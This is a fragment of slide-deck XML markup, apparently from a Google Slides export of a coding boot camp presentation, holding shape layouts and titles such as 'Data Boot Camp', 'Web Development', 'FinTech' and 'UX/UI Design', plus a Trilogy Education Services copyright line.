          <p:cNvPr id="1125" name="Google Shape;1125;p8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6" name="Google Shape;1126;p86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513872" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1127" name="Google Shape;1127;p86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1128" name="Google Shape;1128;p8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129" name="Google Shape;1129;p8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130" name="Google Shape;1130;p8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1" name="Google Shape;1131;p8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8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8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8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8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6" name="Google Shape;1136;p86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1137" name="Google Shape;1137;p8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4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138" name="Google Shape;1138;p8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39" name="Google Shape;1139;p8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140" name="Google Shape;1140;p8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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1142" name="Google Shape;1142;p87"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513872" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1143" name="Google Shape;1143;p87"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1144" name="Google Shape;1144;p8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145" name="Google Shape;1145;p8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146" name="Google Shape;1146;p8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7" name="Google Shape;1147;p8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8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8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8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8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2" name="Google Shape;1152;p87"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1153" name="Google Shape;1153;p8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4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154" name="Google Shape;1154;p87"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5" name="Google Shape;1155;p8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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p88"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513872" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1158" name="Google Shape;1158;p88"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1159" name="Google Shape;1159;p8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160" name="Google Shape;1160;p8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161" name="Google Shape;1161;p8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2" name="Google Shape;1162;p8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8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8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8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8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7" name="Google Shape;1167;p88"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1168" name="Google Shape;1168;p8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4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169" name="Google Shape;1169;p88"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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="5292664"/>
            <a:ext cx="21025801"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1173" name="Google Shape;1173;p8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174" name="Google Shape;1174;p8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175" name="Google Shape;1175;p8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6" name="Google Shape;1176;p8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8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8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8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8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1" name="Google Shape;1181;p8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182" name="Google Shape;1182;p8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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p90"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1185" name="Google Shape;1185;p9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186" name="Google Shape;1186;p9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187" name="Google Shape;1187;p9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8" name="Google Shape;1188;p9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9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9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9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9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3" name="Google Shape;1193;p9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1194" name="Google Shape;1194;p90"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354795" y="1853226"/>
            <a:ext cx="21205801" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1195" name="Google Shape;1195;p9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6" name="Google Shape;1196;p9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197" name="Google Shape;1197;p9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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p9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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1201" name="Google Shape;1201;p9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02" name="Google Shape;1202;p9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03" name="Google Shape;1203;p9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4" name="Google Shape;1204;p9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9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9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9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9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09" name="Google Shape;1209;p9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1210" name="Google Shape;1210;p91"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354795" y="1853226"/>
            <a:ext cx="21205801" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p9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2" name="Google Shape;1212;p9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13" name="Google Shape;1213;p9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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1216" name="Google Shape;1216;p9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17" name="Google Shape;1217;p9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18" name="Google Shape;1218;p9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19" name="Google Shape;1219;p9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9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9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9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9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4" name="Google Shape;1224;p9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225" name="Google Shape;1225;p9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26" name="Google Shape;1226;p9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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p93"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1229" name="Google Shape;1229;p9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30" name="Google Shape;1230;p9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31" name="Google Shape;1231;p9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2" name="Google Shape;1232;p9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9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9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9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9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7" name="Google Shape;1237;p9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238" name="Google Shape;1238;p9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39" name="Google Shape;1239;p9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76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p32"/>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78" name="Google Shape;78;p32"/>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 name="Google Shape;79;p32"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Google Shape;80;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3181867"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p32"/>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Data Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p32"/>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3" name="Google Shape;83;p32"/>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4" name="Google Shape;84;p32"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p32"/>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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p94"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1242" name="Google Shape;1242;p9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43" name="Google Shape;1243;p9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44" name="Google Shape;1244;p9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5" name="Google Shape;1245;p9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9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9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9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9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0" name="Google Shape;1250;p9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51" name="Google Shape;1251;p9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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1254" name="Google Shape;1254;p9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55" name="Google Shape;1255;p9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56" name="Google Shape;1256;p9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7" name="Google Shape;1257;p9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9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9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9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9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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1263" name="Google Shape;1263;p9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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p98"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="5601286"/>
            <a:ext cx="21025801"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1268" name="Google Shape;1268;p9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269" name="Google Shape;1269;p9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270" name="Google Shape;1270;p9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1" name="Google Shape;1271;p9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9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9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9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9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6" name="Google Shape;1276;p9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77" name="Google Shape;1277;p9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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;p99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="5554430"/>
            <a:ext cx="21025801"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1280" name="Google Shape;1280;p99"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1281" name="Google Shape;1281;p9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282" name="Google Shape;1282;p9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283" name="Google Shape;1283;p9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4" name="Google Shape;1284;p9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9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9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9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9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89" name="Google Shape;1289;p9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90" name="Google Shape;1290;p9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1"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513872" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1294" name="Google Shape;1294;p10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Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Confidential &amp; Proprietary Information of Trilogy Education Services, Inc.</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1295" name="Google Shape;1295;p10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Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>© Trilogy Education Services, Inc.</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1296" name="Google Shape;1296;p10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7" name="Google Shape;1297;p10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10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10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10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10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2" name="Google Shape;1302;p10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303" name="Google Shape;1303;p10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304" name="Google Shape;1304;p10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07"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1308" name="Google Shape;1308;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="118" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18792305" y="2427400"/>
            <a:ext cx="4875530" cy="10092796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="Google Shape;1309;p27"/>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10" name="Google Shape;1310;p27"/>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311" name="Google Shape;1311;p27"/>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marR="0" lvl="0"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12" name="Google Shape;1312;p27"/>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13" name="Google Shape;1313;p2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14" name="Google Shape;1314;p27"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p27"/>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316" name="Google Shape;1316;p2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17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p102"/>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1319" name="Google Shape;1319;p102"/>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02"/>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
        <p:nvSpPr>
          <p:cNvPr id="1321" name="Google Shape;1321;p102"/>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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1322" name="Google Shape;1322;p102"/>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1323" name="Google Shape;1323;p102"/>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24" name="Google Shape;1324;p102"/>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25" name="Google Shape;1325;p102"/>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1326" name="Google Shape;1326;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069089" y="3283233"/>
            <a:ext cx="6094420" cy="454033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86"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="Google Shape;87;p33"/>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88" name="Google Shape;88;p3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 name="Google Shape;89;p33"/>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90" name="Google Shape;90;p33"/>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FinTech</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p33"/>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2" name="Google Shape;92;p33"/>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 name="Google Shape;93;p33"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p33"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="Google Shape;95;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436032" y="2786733"/>
            <a:ext cx="6212583" cy="6212583"/>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27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1328" name="Google Shape;1328;p103"/>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1329" name="Google Shape;1329;p103"/>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03"/>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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p103"/>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1332" name="Google Shape;1332;p103"/>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33" name="Google Shape;1333;p103"/>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34" name="Google Shape;1334;p103"/>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1335" name="Google Shape;1335;p103"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558888" y="2822800"/>
            <a:ext cx="6825749" cy="5119304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1336" name="Google Shape;1336;p103"/>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37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
